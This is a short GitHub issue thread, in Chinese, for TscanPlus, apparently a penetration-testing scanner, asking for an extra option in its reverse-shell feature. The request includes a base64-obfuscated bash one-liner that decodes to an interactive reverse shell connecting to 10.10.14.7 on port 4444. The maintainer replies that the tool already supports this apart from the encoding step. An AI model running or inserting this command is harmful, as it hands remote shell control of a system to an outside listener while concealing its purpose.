### ISSUE TITLE
反弹shell功能可以小小的优化一下吗

### ISSUE THREAD

**Issue by mastersir-lab** [TideSec/TscanPlus#171]
增加一个全量命令的选项，例如这个bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC43LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}'

**Comment by TideSec** [comment]
目前也有这种方式，你的这个是加了个编码转换
<img width="989" alt="image" src="https://github.com/user-attachments/assets/501c63d0-99b2-4b8b-b149-0c76da5aa4d7">
